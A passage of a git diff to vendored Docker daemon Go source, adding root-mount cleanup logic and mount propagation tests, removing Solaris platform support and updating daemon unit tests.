b/vendor/github.com/docker/docker/daemon/daemon_linux.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "bufio" @@ -8,10 +8,20 @@ import ( "regexp" "strings" - "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/mount" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) +// On Linux, plugins use a static path for storing execution state, +// instead of deriving path from daemon's exec-root. This is because +// plugin socket files are created here and they cannot exceed max +// path length of 108 bytes. +func getPluginExecRoot(root string) string { + return "/run/docker/plugins" +} + func (daemon *Daemon) cleanupMountsByID(id string) error { logrus.Debugf("Cleaning up old mountid %s: start.", id) f, err := os.Open("/proc/self/mountinfo") @@ -58,9 +68,41 @@ func (daemon *Daemon) cleanupMountsFromReaderByID(reader io.Reader, id string, u return nil } -// cleanupMounts umounts shm/mqueue mounts for old containers +// cleanupMounts umounts used by container resources and the daemon root mount func (daemon *Daemon) cleanupMounts() error { - return daemon.cleanupMountsByID("") + if err := daemon.cleanupMountsByID(""); err != nil { + return err + } + + info, err := mount.GetMounts(mount.SingleEntryFilter(daemon.root)) + if err != nil { + return errors.Wrap(err, "error reading mount table for cleanup") + } + + if len(info) < 1 { + // no mount found, we're done here + return nil + } + + // `info.Root` here is the root mountpoint of the passed in path (`daemon.root`). + // The ony cases that need to be cleaned up is when the daemon has performed a + // `mount --bind /daemon/root /daemon/root && mount --make-shared /daemon/root` + // This is only done when the daemon is started up and `/daemon/root` is not + // already on a shared mountpoint. + if !shouldUnmountRoot(daemon.root, info[0]) { + return nil + } + + unmountFile := getUnmountOnShutdownPath(daemon.configStore) + if _, err := os.Stat(unmountFile); err != nil { + return nil + } + + logrus.WithField("mountpoint", daemon.root).Debug("unmounting daemon root") + if err := mount.Unmount(daemon.root); err != nil { + return err + } + return os.Remove(unmountFile) } func getCleanPatterns(id string) (regexps []*regexp.Regexp) { @@ -78,3 +120,14 @@ func getCleanPatterns(id string) (regexps []*regexp.Regexp) { } return } + +func getRealPath(path string) (string, error) { + return fileutils.ReadSymlinkedDirectory(path) +} + +func shouldUnmountRoot(root string, info *mount.Info) bool { + if !strings.HasSuffix(root, info.Root) { + return false + } + return hasMountinfoOption(info.Optional, sharedPropagationOption) +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go index c40b13ba4c..767925e2fb 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go +++ b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go @@ -1,10 +1,22 @@ // +build linux -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "io/ioutil" + "os" + "path/filepath" "strings" "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) const mountsFixture = `142 78 0:38 / / rw,relatime - aufs none rw,si=573b861da0b3a05b,dio @@ -62,7 +74,7 @@ func TestCleanupMounts(t *testing.T) { d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "", unmount) if unmounted != 1 { - t.Fatalf("Expected to unmount the shm (and the shm only)") + t.Fatal("Expected to unmount the shm (and the shm only)") } } @@ -83,7 +95,7 @@ func TestCleanupMountsByID(t *testing.T) { d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d", unmount) if unmounted != 1 { - t.Fatalf("Expected to unmount the auf root (and that only)") + t.Fatal("Expected to unmount the auf root (and that only)") } } @@ -99,6 +111,212 @@ func TestNotCleanupMounts(t *testing.T) { mountInfo := `234 232 0:59 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k` d.cleanupMountsFromReaderByID(strings.NewReader(mountInfo), "", unmount) if unmounted { - t.Fatalf("Expected not to clean up /dev/shm") + t.Fatal("Expected not to clean up /dev/shm") + } +} + +// TestTmpfsDevShmSizeOverride checks that user-specified /dev/tmpfs mount +// size is not overridden by the default shmsize (that should only be used +// for default /dev/shm (as in "shareable" and "private" ipc modes). +// https://github.com/moby/moby/issues/35271 +func TestTmpfsDevShmSizeOverride(t *testing.T) { + size := "777m" + mnt := "/dev/shm" + + d := Daemon{ + idMappings: &idtools.IDMappings{}, + } + c := &container.Container{ + HostConfig: &containertypes.HostConfig{ + ShmSize: 48 * 1024, // size we should NOT end up with + }, + } + ms := []container.Mount{ + { + Source: "tmpfs", + Destination: mnt, + Data: "size=" + size, + }, + } + + // convert ms to spec + spec := oci.DefaultSpec() + err := setMounts(&d, &spec, c, ms) + assert.Check(t, err) + + // Check the resulting spec for the correct size + found := false + for _, m := range spec.Mounts { + if m.Destination == mnt { + for _, o := range m.Options { + if !strings.HasPrefix(o, "size=") { + continue + } + t.Logf("%+v\n", m.Options) + assert.Check(t, is.Equal("size="+size, o)) + found = true + } + } + } + if !found { + t.Fatal("/dev/shm not found in spec, or size option missing") + } +} + +func TestValidateContainerIsolationLinux(t *testing.T) { + d := Daemon{} + + _, err := d.verifyContainerSettings("linux", &containertypes.HostConfig{Isolation: containertypes.IsolationHyperV}, nil, false) + assert.Check(t, is.Error(err, "invalid isolation 'hyperv' on linux")) +} + +func TestShouldUnmountRoot(t *testing.T) { + for _, test := range []struct { + desc string + root string + info *mount.Info + expect bool + }{ + { + desc: "root is at /", + root: "/docker", + info: &mount.Info{Root: "/docker", Mountpoint: "/docker"}, + expect: true, + }, + { + desc: "root is at in a submount from `/`", + root: "/foo/docker", + info: &mount.Info{Root: "/docker", Mountpoint: "/foo/docker"}, + expect: true, + }, + { + desc: "root is mounted in from a parent mount namespace same root dir", // dind is an example of this + root: "/docker", + info: &mount.Info{Root: "/docker/volumes/1234657/_data", Mountpoint: "/docker"}, + expect: false, + }, + } { + t.Run(test.desc, func(t *testing.T) { + for _, options := range []struct { + desc string + Optional string + expect bool + }{ + {desc: "shared", Optional: "shared:", expect: true}, + {desc: "slave", Optional: "slave:", expect: false}, + {desc: "private", Optional: "private:", expect: false}, + } { + t.Run(options.desc, func(t *testing.T) { + expect := options.expect + if expect { + expect = test.expect + } + if test.info != nil { + test.info.Optional = options.Optional + } + assert.Check(t, is.Equal(expect, shouldUnmountRoot(test.root, test.info))) + }) + } + }) + } +} + +func checkMounted(t *testing.T, p string, expect bool) { + t.Helper() + mounted, err := mount.Mounted(p) + assert.Check(t, err) + assert.Check(t, mounted == expect, "expected %v, actual %v", expect, mounted) +} + +func TestRootMountCleanup(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") } + + t.Parallel() + + testRoot, err := ioutil.TempDir("", t.Name()) + assert.Assert(t, err) + defer os.RemoveAll(testRoot) + cfg := &config.Config{} + + err = mount.MakePrivate(testRoot) + assert.Assert(t, err) + defer mount.Unmount(testRoot) + + cfg.ExecRoot = filepath.Join(testRoot, "exec") + cfg.Root = filepath.Join(testRoot, "daemon") + + err = os.Mkdir(cfg.ExecRoot, 0755) + assert.Assert(t, err) + err = os.Mkdir(cfg.Root, 0755) + assert.Assert(t, err) + + d := &Daemon{configStore: cfg, root: cfg.Root} + unmountFile := getUnmountOnShutdownPath(cfg) + + t.Run("regular dir no mountpoint", func(t *testing.T) { + err = setupDaemonRootPropagation(cfg) + assert.Assert(t, err) + _, err = os.Stat(unmountFile) + assert.Assert(t, err) + checkMounted(t, cfg.Root, true) + + assert.Assert(t, d.cleanupMounts()) + checkMounted(t, cfg.Root, false) + + _, err = os.Stat(unmountFile) + assert.Assert(t, os.IsNotExist(err)) + }) + + t.Run("root is a private mountpoint", func(t *testing.T) { + err = mount.MakePrivate(cfg.Root) + assert.Assert(t, err) + defer mount.Unmount(cfg.Root) + + err = setupDaemonRootPropagation(cfg) + assert.Assert(t, err) + assert.Check(t, ensureShared(cfg.Root)) + + _, err = os.Stat(unmountFile) + assert.Assert(t, os.IsNotExist(err)) + assert.Assert(t, d.cleanupMounts()) + checkMounted(t, cfg.Root, true) + }) + + // mount is pre-configured with a shared mount + t.Run("root is a shared mountpoint", func(t *testing.T) { + err = mount.MakeShared(cfg.Root) + assert.Assert(t, err) + defer mount.Unmount(cfg.Root) + + err = setupDaemonRootPropagation(cfg) + assert.Assert(t, err) + + if _, err := os.Stat(unmountFile); err == nil { + t.Fatal("unmount file should not exist") + } + + assert.Assert(t, d.cleanupMounts()) + checkMounted(t, cfg.Root, true) + assert.Assert(t, mount.Unmount(cfg.Root)) + }) + + // does not need mount but unmount file exists from previous run + t.Run("old mount file is cleaned up on setup if not needed", func(t *testing.T) { + err = mount.MakeShared(testRoot) + assert.Assert(t, err) + defer mount.MakePrivate(testRoot) + err = ioutil.WriteFile(unmountFile, nil, 0644) + assert.Assert(t, err) + + err = setupDaemonRootPropagation(cfg) + assert.Assert(t, err) + + _, err = os.Stat(unmountFile) + assert.Check(t, os.IsNotExist(err), err) + checkMounted(t, cfg.Root, false) + assert.Assert(t, d.cleanupMounts()) + }) + } diff --git a/vendor/github.com/docker/docker/daemon/daemon_solaris.go b/vendor/github.com/docker/docker/daemon/daemon_solaris.go deleted file mode 100644 index 2b4d8d0216..0000000000 --- a/vendor/github.com/docker/docker/daemon/daemon_solaris.go +++ /dev/null @@ -1,523 +0,0 @@ -// +build solaris,cgo - -package daemon - -import ( - "fmt" - "net" - "strconv" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/container" - "github.com/docker/docker/image" - "github.com/docker/docker/layer" - "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/parsers/kernel" - "github.com/docker/docker/pkg/sysinfo" - "github.com/docker/docker/reference" - "github.com/docker/libnetwork" - nwconfig "github.com/docker/libnetwork/config" - "github.com/docker/libnetwork/drivers/solaris/bridge" - "github.com/docker/libnetwork/netlabel" - "github.com/docker/libnetwork/netutils" - lntypes "github.com/docker/libnetwork/types" - "github.com/opencontainers/runc/libcontainer/label" - "github.com/opencontainers/runtime-spec/specs-go" - "github.com/pkg/errors" -) - -//#include -import "C" - -const ( - defaultVirtualSwitch = "Virtual Switch" - platformSupported = true - solarisMinCPUShares = 1 - solarisMaxCPUShares = 65535 -) - -func getMemoryResources(config containertypes.Resources) specs.CappedMemory { - memory := specs.CappedMemory{} - - if config.Memory > 0 { - memory.Physical = strconv.FormatInt(config.Memory, 10) - } - - if config.MemorySwap != 0 { - memory.Swap = strconv.FormatInt(config.MemorySwap, 10) - } - - return memory -} - -func getCPUResources(config containertypes.Resources) specs.CappedCPU { - cpu := specs.CappedCPU{} - - if config.CpusetCpus != "" { - cpu.Ncpus = config.CpusetCpus - } - - return cpu -} - -func (daemon *Daemon) cleanupMountsByID(id string) error { - return nil -} - -func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { - //Since config.SecurityOpt is specifically defined as a "List of string values to - //customize labels for MLs systems, such as SELinux" - //until we figure out how to map to Trusted Extensions - //this is being disabled for now on Solaris - var ( - labelOpts []string - err error - ) - - if len(config.SecurityOpt) > 0 { - return errors.New("Security options are not supported on Solaris") - } - - container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts) - return err -} - -func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { - return nil, nil, nil -} - -func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { - return nil -} - -func (daemon *Daemon) getLayerInit() func(string) error { - return nil -} - -func checkKernel() error { - // solaris can rely upon checkSystem() below, we don't skew kernel versions - return nil -} - -func (daemon *Daemon) getCgroupDriver() string { - return "" -} - -func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error { - if hostConfig.CPUShares < 0 { - logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, solarisMinCPUShares) - hostConfig.CPUShares = solarisMinCPUShares - } else if hostConfig.CPUShares > solarisMaxCPUShares { - logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, solarisMaxCPUShares) - hostConfig.CPUShares = solarisMaxCPUShares - } - - if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 { - // By default, MemorySwap is set to twice the size of Memory. - hostConfig.MemorySwap = hostConfig.Memory * 2 - } - - if hostConfig.ShmSize != 0 { - hostConfig.ShmSize = container.DefaultSHMSize - } - if hostConfig.OomKillDisable == nil { - defaultOomKillDisable := false - hostConfig.OomKillDisable = &defaultOomKillDisable - } - - return nil -} - -// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd -func UsingSystemd(config *Config) bool { - return false -} - -// verifyPlatformContainerSettings performs platform-specific validation of the -// hostconfig and config structures. -func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { - warnings := []string{} - sysInfo := sysinfo.New(true) - // NOTE: We do not enforce a minimum value for swap limits for zones on Solaris and - // therefore we will not do that for Docker container either. - if hostConfig.Memory > 0 && !sysInfo.MemoryLimit { - warnings = append(warnings, "Your kernel does not support memory limit capabilities. Limitation discarded.") - logrus.Warnf("Your kernel does not support memory limit capabilities. Limitation discarded.") - hostConfig.Memory = 0 - hostConfig.MemorySwap = -1 - } - if hostConfig.Memory > 0 && hostConfig.MemorySwap != -1 && !sysInfo.SwapLimit { - warnings = append(warnings, "Your kernel does not support swap limit capabilities, memory limited without swap.") - logrus.Warnf("Your kernel does not support swap limit capabilities, memory limited without swap.") - hostConfig.MemorySwap = -1 - } - if hostConfig.Memory > 0 && hostConfig.MemorySwap > 0 && hostConfig.MemorySwap < hostConfig.Memory { - return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage.") - } - // Solaris NOTE: We allow and encourage setting the swap without setting the memory limit. - - if hostConfig.MemorySwappiness != nil && *hostConfig.MemorySwappiness != -1 && !sysInfo.MemorySwappiness { - warnings = append(warnings, "Your kernel does not support memory swappiness capabilities, memory swappiness discarded.") - logrus.Warnf("Your kernel does not support memory swappiness capabilities, memory swappiness discarded.") - hostConfig.MemorySwappiness = nil - } - if hostConfig.MemoryReservation > 0 && !sysInfo.MemoryReservation { - warnings = append(warnings, "Your kernel does not support memory soft limit capabilities. Limitation discarded.") - logrus.Warnf("Your kernel does not support memory soft limit capabilities. Limitation discarded.") - hostConfig.MemoryReservation = 0 - } - if hostConfig.Memory > 0 && hostConfig.MemoryReservation > 0 && hostConfig.Memory < hostConfig.MemoryReservation { - return warnings, fmt.Errorf("Minimum memory limit should be larger than memory reservation limit, see usage.") - } - if hostConfig.KernelMemory > 0 && !sysInfo.KernelMemory { - warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities. Limitation discarded.") - logrus.Warnf("Your kernel does not support kernel memory limit capabilities. Limitation discarded.") - hostConfig.KernelMemory = 0 - } - if hostConfig.CPUShares != 0 && !sysInfo.CPUShares { - warnings = append(warnings, "Your kernel does not support CPU shares. Shares discarded.") - logrus.Warnf("Your kernel does not support CPU shares. Shares discarded.") - hostConfig.CPUShares = 0 - } - if hostConfig.CPUShares < 0 { - warnings = append(warnings, "Invalid CPUShares value. Must be positive. Discarding.") - logrus.Warnf("Invalid CPUShares value. Must be positive. Discarding.") - hostConfig.CPUQuota = 0 - } - if hostConfig.CPUShares > 0 && !sysinfo.IsCPUSharesAvailable() { - warnings = append(warnings, "Global zone default scheduling class not FSS. Discarding shares.") - logrus.Warnf("Global zone default scheduling class not FSS. Discarding shares.") - hostConfig.CPUShares = 0 - } - - // Solaris NOTE: Linux does not do negative checking for CPUShares and Quota here. But it makes sense to. - if hostConfig.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod { - warnings = append(warnings, "Your kernel does not support CPU cfs period. Period discarded.") - logrus.Warnf("Your kernel does not support CPU cfs period. Period discarded.") - if hostConfig.CPUQuota > 0 { - warnings = append(warnings, "Quota will be applied on default period, not period specified.") - logrus.Warnf("Quota will be applied on default period, not period specified.") - } - hostConfig.CPUPeriod = 0 - } - if hostConfig.CPUQuota != 0 && !sysInfo.CPUCfsQuota { - warnings = append(warnings, "Your kernel does not support CPU cfs quota. Quota discarded.") - logrus.Warnf("Your kernel does not support CPU cfs quota. Quota discarded.") - hostConfig.CPUQuota = 0 - } - if hostConfig.CPUQuota < 0 { - warnings = append(warnings, "Invalid CPUQuota value. Must be positive. Discarding.") - logrus.Warnf("Invalid CPUQuota value. Must be positive. Discarding.") - hostConfig.CPUQuota = 0 - } - if (hostConfig.CpusetCpus != "" || hostConfig.CpusetMems != "") && !sysInfo.Cpuset { - warnings = append(warnings, "Your kernel does not support cpuset. Cpuset discarded.") - logrus.Warnf("Your kernel does not support cpuset. Cpuset discarded.") - hostConfig.CpusetCpus = "" - hostConfig.CpusetMems = "" - } - cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(hostConfig.CpusetCpus) - if err != nil { - return warnings, fmt.Errorf("Invalid value %s for cpuset cpus.", hostConfig.CpusetCpus) - } - if !cpusAvailable { - return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s.", hostConfig.CpusetCpus, sysInfo.Cpus) - } - memsAvailable, err := sysInfo.IsCpusetMemsAvailable(hostConfig.CpusetMems) - if err != nil { - return warnings, fmt.Errorf("Invalid value %s for cpuset mems.", hostConfig.CpusetMems) - } - if !memsAvailable { - return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s.", hostConfig.CpusetMems, sysInfo.Mems) - } - if hostConfig.BlkioWeight > 0 && !sysInfo.BlkioWeight { - warnings = append(warnings, "Your kernel does not support Block I/O weight. Weight discarded.") - logrus.Warnf("Your kernel does not support Block I/O weight. Weight discarded.") - hostConfig.BlkioWeight = 0 - } - if hostConfig.OomKillDisable != nil && !sysInfo.OomKillDisable { - *hostConfig.OomKillDisable = false - // Don't warn; this is the default setting but only applicable to Linux - } - - if sysInfo.IPv4ForwardingDisabled { - warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.") - logrus.Warnf("IPv4 forwarding is disabled. Networking will not work") - } - - // Solaris NOTE: We do not allow setting Linux specific options, so check and warn for all of them. - - if hostConfig.CapAdd != nil || hostConfig.CapDrop != nil { - warnings = append(warnings, "Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.") - logrus.Warnf("Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.") - hostConfig.CapAdd = nil - hostConfig.CapDrop = nil - } - - if hostConfig.GroupAdd != nil { - warnings = append(warnings, "Additional groups unsupported on Solaris.Discarding groups lists.") - logrus.Warnf("Additional groups unsupported on Solaris.Discarding groups lists.") - hostConfig.GroupAdd = nil - } - - if hostConfig.IpcMode != "" { - warnings = append(warnings, "IPC namespace assignment unsupported on Solaris.Discarding IPC setting.") - logrus.Warnf("IPC namespace assignment unsupported on Solaris.Discarding IPC setting.") - hostConfig.IpcMode = "" - } - - if hostConfig.PidMode != "" { - warnings = append(warnings, "PID namespace setting unsupported on Solaris. Running container in host PID namespace.") - logrus.Warnf("PID namespace setting unsupported on Solaris. Running container in host PID namespace.") - hostConfig.PidMode = "" - } - - if hostConfig.Privileged { - warnings = append(warnings, "Privileged mode unsupported on Solaris. Discarding privileged mode setting.") - logrus.Warnf("Privileged mode unsupported on Solaris. Discarding privileged mode setting.") - hostConfig.Privileged = false - } - - if hostConfig.UTSMode != "" { - warnings = append(warnings, "UTS namespace assignment unsupported on Solaris.Discarding UTS setting.") - logrus.Warnf("UTS namespace assignment unsupported on Solaris.Discarding UTS setting.") - hostConfig.UTSMode = "" - } - - if hostConfig.CgroupParent != "" { - warnings = append(warnings, "Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.") - logrus.Warnf("Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.") - hostConfig.CgroupParent = "" - } - - if hostConfig.Ulimits != nil { - warnings = append(warnings, "Specifying ulimits unsupported on Solaris. Discarding ulimits setting.") - logrus.Warnf("Specifying ulimits unsupported on Solaris. Discarding ulimits setting.") - hostConfig.Ulimits = nil - } - - return warnings, nil -} - -// platformReload update configuration with platform specific options -func (daemon *Daemon) platformReload(config *Config) map[string]string { - return map[string]string{} -} - -// verifyDaemonSettings performs validation of daemon config struct -func verifyDaemonSettings(config *Config) error { - - if config.DefaultRuntime == "" { - config.DefaultRuntime = stockRuntimeName - } - if config.Runtimes == nil { - config.Runtimes = make(map[string]types.Runtime) - } - stockRuntimeOpts := []string{} - config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary, Args: stockRuntimeOpts} - - // checkSystem validates platform-specific requirements - return nil -} - -func checkSystem() error { - // check OS version for compatibility, ensure running in global zone - var err error - var id C.zoneid_t - - if id, err = C.getzoneid(); err != nil { - return fmt.Errorf("Exiting. Error getting zone id: %+v", err) - } - if int(id) != 0 { - return fmt.Errorf("Exiting because the Docker daemon is not running in the global zone") - } - - v, err := kernel.GetKernelVersion() - if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 5, Major: 12, Minor: 0}) < 0 { - return fmt.Errorf("Your Solaris kernel version: %s doesn't support Docker. Please upgrade to 5.12.0", v.String()) - } - return err -} - -// configureMaxThreads sets the Go runtime max threads threshold -// which is 90% of the kernel setting from /proc/sys/kernel/threads-max -func configureMaxThreads(config *Config) error { - return nil -} - -// configureKernelSecuritySupport configures and validate security support for the kernel -func configureKernelSecuritySupport(config *Config, driverName string) error { - return nil -} - -func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { - netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes) - if err != nil { - return nil, err - } - - controller, err := libnetwork.New(netOptions...) - if err != nil { - return nil, fmt.Errorf("error obtaining controller instance: %v", err) - } - - // Initialize default network on "null" - if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false)); err != nil { - return nil, fmt.Errorf("Error creating default 'null' network: %v", err) - } - - if !config.DisableBridge { - // Initialize default driver "bridge" - if err := initBridgeDriver(controller, config); err != nil { - return nil, err - } - } - - return controller, nil -} - -func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { - if n, err := controller.NetworkByName("bridge"); err == nil { - if err = n.Delete(); err != nil { - return fmt.Errorf("could not delete the default bridge network: %v", err) - } - } - - bridgeName := bridge.DefaultBridgeName - if config.bridgeConfig.Iface != "" { - bridgeName = config.bridgeConfig.Iface - } - netOption := map[string]string{ - bridge.BridgeName: bridgeName, - bridge.DefaultBridge: strconv.FormatBool(true), - netlabel.DriverMTU: strconv.Itoa(config.Mtu), - bridge.EnableICC: strconv.FormatBool(config.bridgeConfig.InterContainerCommunication), - } - - // --ip processing - if config.bridgeConfig.DefaultIP != nil { - netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String() - } - - var ipamV4Conf *libnetwork.IpamConf - - ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} - - nwList, _, err := netutils.ElectInterfaceAddresses(bridgeName) - if err != nil { - return errors.Wrap(err, "list bridge addresses failed") - } - - nw := nwList[0] - if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" { - _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) - if err != nil { - return errors.Wrap(err, "parse CIDR failed") - } - // Iterate through in case there are multiple addresses for the bridge - for _, entry := range nwList { - if fCIDR.Contains(entry.IP) { - nw = entry - break - } - } - } - - ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String() - hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask) - if hip.IsGlobalUnicast() { - ipamV4Conf.Gateway = nw.IP.String() - } - - if config.bridgeConfig.IP != "" { - ipamV4Conf.PreferredPool = config.bridgeConfig.IP - ip, _, err := net.ParseCIDR(config.bridgeConfig.IP) - if err != nil { - return err - } - ipamV4Conf.Gateway = ip.String() - } else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" { - logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool) - } - - if config.bridgeConfig.FixedCIDR != "" { - _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) - if err != nil { - return err - } - - ipamV4Conf.SubPool = fCIDR.String() - } - - if config.bridgeConfig.DefaultGatewayIPv4 != nil { - ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String() - } - - v4Conf := []*libnetwork.IpamConf{ipamV4Conf} - v6Conf := []*libnetwork.IpamConf{} - - // Initialize default network on "bridge" with the same name - _, err = controller.NewNetwork("bridge", "bridge", "", - libnetwork.NetworkOptionDriverOpts(netOption), - libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), - libnetwork.NetworkOptionDeferIPv6Alloc(false)) - if err != nil { - return fmt.Errorf("Error creating default 'bridge' network: %v", err) - } - return nil -} - -// registerLinks sets up links between containers and writes the -// configuration out for persistence. -func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { - return nil -} - -func (daemon *Daemon) cleanupMounts() error { - return nil -} - -// conditionalMountOnStart is a platform specific helper function during the -// container start to call mount. -func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { - return daemon.Mount(container) -} - -// conditionalUnmountOnCleanup is a platform specific helper function called -// during the cleanup of a container to unmount. -func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { - return daemon.Unmount(container) -} - -func restoreCustomImage(is image.Store, ls layer.Store, rs reference.Store) error { - // Solaris has no custom images to register - return nil -} - -func driverOptions(config *Config) []nwconfig.Option { - return []nwconfig.Option{} -} - -func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { - return nil, nil -} - -// setDefaultIsolation determine the default isolation mode for the -// daemon to run in. This is only applicable on Windows -func (daemon *Daemon) setDefaultIsolation() error { - return nil -} - -func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { - return types.RootFS{} -} - -func setupDaemonProcess(config *Config) error { - return nil -} - -func (daemon *Daemon) setupSeccompProfile() error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/daemon_test.go b/vendor/github.com/docker/docker/daemon/daemon_test.go index 00817bd1b6..43f4f504b6 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_test.go +++ b/vendor/github.com/docker/docker/daemon/daemon_test.go @@ -1,27 +1,24 @@ -// +build !solaris - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "io/ioutil" "os" "path/filepath" - "reflect" + "runtime" "testing" - "time" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/pkg/discovery" + "github.com/docker/docker/errdefs" _ "github.com/docker/docker/pkg/discovery/memory" - "github.com/docker/docker/pkg/registrar" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/truncindex" - "github.com/docker/docker/registry" - "github.com/docker/docker/volume" - volumedrivers "github.com/docker/docker/volume/drivers" - "github.com/docker/docker/volume/local" - "github.com/docker/docker/volume/store" + volumesservice "github.com/docker/docker/volume/service" "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // @@ -30,38 +27,28 @@ import ( func TestGetContainer(t *testing.T) { c1 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", - Name: "tender_bardeen", - }, + ID: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", + Name: "tender_bardeen", } c2 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de", - Name: "drunk_hawking", - }, + ID: "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de", + Name: "drunk_hawking", } c3 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57", - Name: "3cdbd1aa", - }, + ID: "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57", + Name: "3cdbd1aa", } c4 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5", - Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", - }, + ID: "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5", + Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", } c5 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b", - Name: "d22d69a2b896", - }, + ID: "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b", + Name: "d22d69a2b896", } store := container.NewMemoryStore() @@ -78,10 +65,15 @@ func TestGetContainer(t *testing.T) { index.Add(c4.ID) index.Add(c5.ID) + containersReplica, err := container.NewViewDB() + if err != nil { + t.Fatalf("could not create ViewDB: %v", err) + } + daemon := &Daemon{ - containers: store, - idIndex: index, - nameIndex: registrar.NewRegistrar(), + containers: store, + containersReplica: containersReplica, + idIndex: index, } daemon.reserveName(c1.ID, c1.Name) @@ -126,17 +118,10 @@ func initDaemonWithVolumeStore(tmp string) (*Daemon, error) { repository: tmp, 